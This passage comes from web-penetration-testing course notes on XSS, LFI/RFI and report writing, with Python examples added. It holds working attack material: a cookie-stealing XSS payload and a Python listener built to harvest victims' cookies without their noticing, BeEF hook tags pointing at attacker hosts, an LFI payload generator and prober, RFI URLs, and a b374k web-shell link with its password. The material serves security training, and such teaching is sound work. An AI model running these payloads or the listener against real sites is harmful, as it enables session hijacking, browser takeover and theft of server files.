- "http://listener-ip:port/b.php?"+document.cookie; - identifies the server the script will communicate with, and appends the victim's cookies to the request as the query string (only cookies without the HttpOnly flag are visible to document.cookie)
How do we get data back from the attack?
We need a LISTENER!
This can be accomplished with netcat.
#nc -nlvp 80
Netcat listens on port 80, with the options n - no DNS resolution, l - listen for an incoming connection, v - verbose, p - which port to use. When the victim's browser connects, its request line appears on the listener with the cookies after "b.php?".
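netcat shows the raw request and leaves the victim's browser with a half-open connection. This added example (not from the course) is a Python stand-in for the listener: it parses the cookie string that the new Image() payload appends after "b.php?", logs it as name=value pairs, and answers 200 so nothing looks broken on the victim's side. parse_exfil_path() is pure and is exercised on a constructed request path; serve() binds a real socket and only runs from __main__. The b.php name, the listener port and the payload format come from the lesson.

```python
# Added example, not part of the course notes: a cookie-catching listener.
# The sample request path in __main__ is constructed.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit


def parse_exfil_path(path: str) -> dict:
    """Turn '/b.php?PHPSESSID=abc;%20user=guest' into {'PHPSESSID': 'abc', 'user': 'guest'}.

    document.cookie is 'name=value; name2=value2' and the payload appends it
    verbatim, so the whole query string is one cookie header, URL-encoded by
    the browser (spaces become %20). It is NOT a normal a=b&c=d query string.
    """
    query = urlsplit(path).query
    cookies = {}
    for part in unquote(query).split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")   # split on the first '=' only
        cookies[name.strip()] = value.strip()
    return cookies


class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = parse_exfil_path(self.path)
        # the hooked browser's address tells you which victim this came from
        print(f"[+] {self.client_address[0]} {self.path}")
        for name, value in cookies.items():
            print(f"    {name} = {value}")
        # reply with an empty image so the victim's page shows nothing odd
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):   # silence the default access log
        pass


def serve(port: int = 80) -> None:
    # port 80 needs root, exactly like `nc -nlvp 80`; use 8080 otherwise
    HTTPServer(("0.0.0.0", port), CookieCatcher).serve_forever()


if __name__ == "__main__":
    import sys
    print(parse_exfil_path("/b.php?PHPSESSID=abc123;%20user=guest"))  # constructed
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 8080)
```

The listener port must match the one in the payload and be reachable from the victim's network, and a session cookie set with HttpOnly will never arrive here; if the application sets HttpOnly, BeEF-style browser hijacking is the route rather than cookie theft.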
http://www.danscourses.com/Network-Penetration-Testing/xss-with-a-vulnerable-webapp.html
Exploiting XSS 2
This lesson covers exploiting XSS using the BeEF tool. BeEF is a multi-step process which allows an attacker to take control of a victim's browser.
Exploit XSS with BeEF:
BeEF is a multi-step process which will give you control over a victim's browser.
First step: build your malicious code
Second step: make the URL
Third step: send the URL to a victim
Fourth: profit ($$$$)
If you are running Kali 2.0 you can start BeEF from the Applications - Exploitation Tools menu.
After that, browse to http://127.0.0.1:3000/UI/Authentication
username: beef
password: beef
(these are the defaults; change them before using BeEF on an engagement)
Next, the malicious code will need to be crafted:
<script src=http://attackerIP:3000/hook.js></script>
This line is shown when you initially start BeEF.
Next, that code will need to be delivered. This can be done by placing it into a vulnerable field as we did in our prior example, or it can be delivered via a link like the one below:
http://example.com/search.asp?query=<script src=http://attackerIP:3000/hook.js></script>
After the code is delivered, you wait for the victim to browse to the site; once they do, the hooked browser appears in the BeEF panel as confirmation, as shown below!
The CODE:
<script src="http://192.168.2.21:3000/hook.js"></script>
You need to have patience while you exploit through a browser! Don't give up so easily!
XSS Lab
This lesson discusses the XSS lab. The lab will cover:
• XSS discovery
• XSS exploitation
• XSS exploitation (bonus section)
Use Vega or ZAP to scan the "Web for Pentesters" webpage for an XSS vulnerability!
Then, use a manual script to create an alert window!
Generate a BeEF link using the exploitable page!
Browse to the generated link and, using the BeEF tools, take a snapshot of the monitor!
For the bonus work:
Set up a second VM
From the second VM, browse to the malicious link!
Use the BeEF tools to enumerate information about the new host!
MODULE 4
LFI & RFI 1
This lesson offers a brief introduction to Local File Inclusion (LFI) and Remote File Inclusion (RFI) and will cover the following:
1. What is LFI
LFI is a vulnerability in which a web application includes a file from its own server based on a user-supplied name, without restricting which file that can be.
In simple terms, it allows you to view files on the server and, in some cases, execute commands.
It can be used to traverse the filesystem (../../) and gain access to files that should normally not be accessible.
2. What does LFI look like?
Check the "LFI - what does LFI look like.txt" file.
3. Why is LFI dangerous?
LFI, as I said earlier, is used to access files. If you have the ability to access files as the root user, this opens doors to sensitive files.
Check "LFI - why is LFI dangerous"
4. What is RFI?
See next lesson...
5. What does RFI look like and why is it dangerous?
See next lesson...
LFI & RFI 2
This lesson covers how LFI works, using the Kali box. Participants receive step by step instructions on how to discover the source of a file. LFI is used to access files and can open doors to sensitive files if one has the ability to access files as the root user.
4. Why is LFI dangerous?
Because it can reveal directories and files we are not meant to access or view!
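The lesson shows direct reads; this added example (not from the course) generates the usual probe values for a file-inclusion parameter and recognises /etc/passwd in what comes back. The traversal-depth loop, the trailing %00 and the php://filter variant go a little beyond the lesson: all three are standard LFI checks, the null byte only matters on PHP older than 5.3.4, and php://filter returns a file base64-encoded instead of executing it, which is how you read the source of .php files such as a database config. The response in fake_fetch is constructed; probe() takes a fetch callable so the logic runs offline, and its default fetcher assumes the parameter is in the query string of a GET.

```python
# Added example, not part of the course notes: LFI payload generation and
# /etc/passwd detection. The FAKE_PASSWD response is constructed.
import re
import urllib.request


def traversal_payloads(target: str = "/etc/passwd", max_depth: int = 8):
    """Yield candidate values for the vulnerable parameter, shallowest first."""
    rel = target.lstrip("/")
    yield target                                  # absolute path, if include() takes one
    for depth in range(1, max_depth + 1):
        yield "../" * depth + rel                 # climb out of the include directory
        yield "../" * depth + rel + "%00"         # null byte: cuts an appended ".php" (PHP < 5.3.4)
    # php://filter hands back the file base64-encoded instead of running it
    yield "php://filter/convert.base64-encode/resource=" + rel


# one well-formed passwd entry: name:pw:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(r"^[a-z_][a-z0-9_-]*:[x*!]?:\d+:\d+:.*:/.*:/\S+$", re.M)


def looks_like_passwd(body: str) -> bool:
    """True if the body contains at least one /etc/passwd style line."""
    return bool(PASSWD_LINE.search(body))


def probe(base_url: str, param: str, fetch=None):
    """Try each payload; return (payload, body) for the first successful read, else None."""
    if fetch is None:
        def fetch(url):
            return urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    for payload in traversal_payloads():
        url = f"{base_url}?{param}={payload}"     # %00 must stay as-is, so no urlencode here
        body = fetch(url)
        if looks_like_passwd(body):
            return payload, body
    return None


# constructed stand-in for the Web for Pentesters host: only a 3-deep traversal works
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "www-data:x:33:33:www-data:/var/www:/bin/sh\n")


def fake_fetch(url: str) -> str:
    if "file=../../../etc/passwd" in url:
        return FAKE_PASSWD
    return "<html>Warning: include(): failed to open stream</html>"


if __name__ == "__main__":
    hit = probe("http://192.168.2.119/lfi/example1.php", "file", fetch=fake_fetch)
    print("no LFI found" if hit is None else f"LFI with file={hit[0]}\n{hit[1]}")
```

Matching on the structure of a passwd line rather than on the word "root" avoids false positives from error pages that echo the requested path back.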
LFI & RFI 3
This lesson covers RFI.
RFI occurs when a web application includes a file from a location the user controls, without validating it, so the server fetches the attacker's file from a remote host and executes it. Unlike the upload used later in the lab, no file has to be placed on the target first. The result is code execution, which can be used to deface or gain access to a web site.
example:
http://www.example.com/vuln_page.php?file=http://www.badiste.com/malicious
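The bug behind both LFI and RFI is the same include call, so this added example (not from the course) models it in Python. resolve_vulnerable() mirrors PHP's include($_GET['file']) with allow_url_include on: it returns whatever the caller named, local or remote. resolve_hardened() is one correct fix: an allow-list of page names plus confinement to one directory. PAGES_DIR, ALLOWED_PAGES and the sample inputs are hypothetical, except for the lesson's own RFI URL.

```python
# Added example, not part of the course notes: the vulnerable include resolver
# beside a hardened one. Directory and page names are hypothetical.
import os
from typing import Optional
from urllib.parse import urlsplit

PAGES_DIR = "/var/www/pages"          # hypothetical directory of includable pages


def resolve_vulnerable(file_param: str) -> str:
    """What include() would open: a URL is fetched (RFI), '../' walks the disk (LFI)."""
    if urlsplit(file_param).scheme in ("http", "https", "ftp"):
        return file_param                                   # remote file inclusion
    return os.path.normpath(os.path.join(PAGES_DIR, file_param))   # local file inclusion


ALLOWED_PAGES = {"home", "about", "contact"}   # allow-list, not a deny-list of bad strings


def resolve_hardened(file_param: str) -> Optional[str]:
    """Return the path to include, or None if the request is refused."""
    if file_param not in ALLOWED_PAGES:
        return None                        # anything not explicitly allowed is rejected
    base = os.path.realpath(PAGES_DIR)
    path = os.path.realpath(os.path.join(base, file_param + ".php"))
    # defence in depth: even an allowed name must resolve inside PAGES_DIR
    if os.path.commonpath([base, path]) != base:
        return None
    return path


SAMPLES = [
    "about",                                    # legitimate
    "../../../etc/passwd",                      # LFI
    "../../../etc/passwd%00",                   # LFI with null byte (PHP would truncate here)
    "http://www.badiste.com/malicious",         # RFI, the lesson's example
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:40s} vulnerable -> {resolve_vulnerable(s)}")
        print(f"{'':40s} hardened   -> {resolve_hardened(s)}")
```

Stripping "../" or blocking "http://" from the parameter is the tempting fix and it does not hold up (encoded slashes, "....//", "HTTP://"); mapping a short name onto a fixed set of files removes the attacker's control over the path entirely.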
This is dangerous because it allows an attacker to run anything they want on the server, such as:
- a backdoor
- a keylogger
- a malware distribution point
- bots
RFI tool:
https://code.google.com/archive/p/b374k-shell/
If executed properly it will give you a PHP shell in your browser.
http://192.168.2.119/upload/images/b374k-2.8.php
The password is: b374k
This is a very dangerous tool if an attacker were to get it onto your system.
LFI & RFI Lab
This lesson offers a brief introduction to the LFI and RFI lab. This unit covers:
1. LFI discovery - use the "Web for Pentesters" webpage to identify an LFI vulnerability manually or with ZAP.
2. LFI exploitation - use the vulnerable URL to read the /etc/network file
SEE TEXT file!
3. RFI discovery - using the "Web for Pentesters" webpage, identify an RFI vulnerability manually or with ZAP.
4. RFI exploitation - once the vulnerability is discovered, upload the b374k software and download the passwd file.
http://192.168.2.119/upload/images/b374k-2.8.php
http://192.168.2.119/upload/example1.php
MODULE 5
Report Creation 1
• What to include (Details)
- Planning, Assumptions, Objective, Methodology, Timeline.
- Affected assets, vulnerabilities found (CVE IDs), impact, attack probability, estimated loss, recommendations.
o Artifacts
• What to consider
o Audience
o Time
o Classification
• Supporting documentation
Report Creation 2
What to include (artifacts):
- images
- logs
- charts
- graphs
- packets
- code
What to consider (Audience):
- who are you presenting this to?
- how much do they need to know?
- how technical are they?
- what are they allowed to know?
What to consider (Time):
- how quickly does the report need to be completed?
- when will it be presented?
- how long should the presentation be?
What to consider (Classification):
- what kind of organization are you performing this test for? (government, large corporation, small company)
Supporting Documentation:
- have all supporting documentation consolidated and make it easy to deliver
- this includes, but is not limited to, the following: PCAPs, Nmap results, fuzzer reports, screen captures, XML files
Wrap Up
1. HTTP and HTTPS basics
2. Why do web sites get hacked?
3. Hacker methodology
4. SQL injection
5. Cross site scripting (XSS)
6. LFI and RFI
7. Reporting
HAPPY HACKING EVERYONE!